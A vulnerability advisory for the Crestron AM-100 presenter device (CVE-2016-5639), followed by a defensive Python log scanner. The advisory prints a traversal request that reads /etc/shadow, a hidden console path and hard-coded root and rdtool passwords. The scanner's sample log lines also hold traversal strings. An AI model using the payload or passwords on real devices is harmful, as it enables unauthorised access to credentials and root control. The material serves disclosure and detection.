Crestron AM-100 1.2.1 Path Traversal / Hard-Coded Credentials

2016.11.23
Credit: Zach Lanier
Risk: High
Local: No
Remote: Yes
CWE: CWE-22


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

=================================================================
# Crestron AM-100 (Multiple Vulnerabilities)
=================================================================
# Date: 2016-08-01
# Exploit Author: Zach Lanier
# Vendor Homepage: https://www.crestron.com/products/model/am-100
# Version: v1.1.1.11 - v1.2.1
# CVE: CVE-2016-5639
# References:
# https://medium.com/@benichmt1/an-unwanted-wireless-guest-9433383b1673#.78tu9divi
# https://github.com/CylanceVulnResearch/disclosures/blob/master/CLVA-2016-05-001.md

Description:
The Crestron AirMedia AM-100 with firmware versions v1.1.1.11 - v1.2.1 is vulnerable to multiple issues.

1) Path Traversal

GET request:
http://[AM-100-ADDRESS]/cgi-bin/login.cgi?lang=en&src=../../../../../../../../../../../../../../../../../../../../etc/shadow

2) Hidden Management Console

http://[AM-100-ADDRESS]/cgi-bin/login_rdtool.cgi

The AM-100 has a hardcoded default credential of rdtool::mistral5885

This interface contains the ability to upload arbitrary files (RD upload) and can enable a telnet server that runs on port 5885 (RD Debug mode).

3) Hardcoded credentials

The default root password for these devices is root::awind5885

Valid login sessions for the default (non-debugging) management interface are stored on the filesystem as session01, session02, etc. Cleartext credentials can be read directly from these files.
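For defenders, the two web-facing issues above (the unchecked src parameter of login.cgi, CWE-22, and the reachable login_rdtool.cgi console) can be caught from ordinary web-server access logs in front of the device, and the traversal itself is prevented by canonicalising the requested path against the document root before opening it. The following Python is an added example, not code from the advisory, the vendor or the researcher: the access-log lines are constructed in the common combined log format, and the document root /www is a hypothetical value used only to show the canonicalisation check the vulnerable handler lacked.

```python
"""Detect the advisory's two web-facing issues in access logs and show the
path-canonicalisation check that prevents CWE-22. Added example; the log lines
are constructed and the document root is hypothetical."""
import posixpath
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines (combined log format), not real device logs.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Aug/2016:10:00:01 +0000] "GET /cgi-bin/login.cgi?lang=en HTTP/1.1" 200 512
10.0.0.9 - - [01/Aug/2016:10:00:02 +0000] "GET /cgi-bin/login.cgi?lang=en&src=../../../../etc/shadow HTTP/1.1" 200 1024
10.0.0.9 - - [01/Aug/2016:10:00:03 +0000] "GET /cgi-bin/login.cgi?lang=en&src=..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 200 980
10.0.0.9 - - [01/Aug/2016:10:00:04 +0000] "GET /cgi-bin/login_rdtool.cgi HTTP/1.1" 200 300
10.0.0.7 - - [01/Aug/2016:10:00:05 +0000] "GET /cgi-bin/login.cgi?lang=de&src=login_de.html HTTP/1.1" 200 600
"""

# Pulls client IP, timestamp, method, request target and status out of one log line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

WEB_ROOT = "/www"  # hypothetical document root, assumed for the example only
HIDDEN_CONSOLE = "/cgi-bin/login_rdtool.cgi"  # path named in the advisory


def resolve_under_root(root: str, user_path: str) -> Optional[str]:
    """Return the canonical filesystem path of user_path under root, or None
    when the normalised result escapes root. This is the check a CWE-22-safe
    handler performs before opening a file named by a request parameter."""
    root = posixpath.normpath(root)
    # Decode twice so that percent-encoded and double-encoded ../ sequences
    # are normalised rather than passed through as literal characters.
    decoded = unquote(unquote(user_path))
    candidate = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    if candidate == root or candidate.startswith(root + "/"):
        return candidate
    return None


def classify(line: str) -> Optional[Dict[str, object]]:
    """Parse one access-log line and list the advisory-related findings in it."""
    match = REQUEST_RE.match(line)
    if not match:
        return None  # not a request line we understand; skip it
    target = urlsplit(match.group("target"))
    params = parse_qs(target.query, keep_blank_values=True)
    findings: List[str] = []
    if target.path == HIDDEN_CONSOLE:
        findings.append("hidden-rdtool-console")
    # Any src value that would not stay inside the document root is traversal.
    for src in params.get("src", []):
        if resolve_under_root(WEB_ROOT, src) is None:
            findings.append("path-traversal:src")
    return {
        "ip": match.group("ip"),
        "ts": match.group("ts"),
        "status": int(match.group("status")),
        "target": match.group("target"),
        "findings": findings,
    }


def scan_log(text: str) -> List[Dict[str, object]]:
    """Return the parsed entries that carry at least one finding."""
    alerts = []
    for line in text.splitlines():
        entry = classify(line)
        if entry and entry["findings"]:
            alerts.append(entry)
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert["ts"], alert["ip"], alert["status"], ",".join(alert["findings"]), alert["target"])
```

Run against the constructed sample, the scanner reports the two traversal requests (one plain, one percent-encoded) and the hit on the hidden console, while the legitimate lang=de request that names a file inside the root passes. A 200 status on a traversal request is the signal that matters most: it means the device actually served the file.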

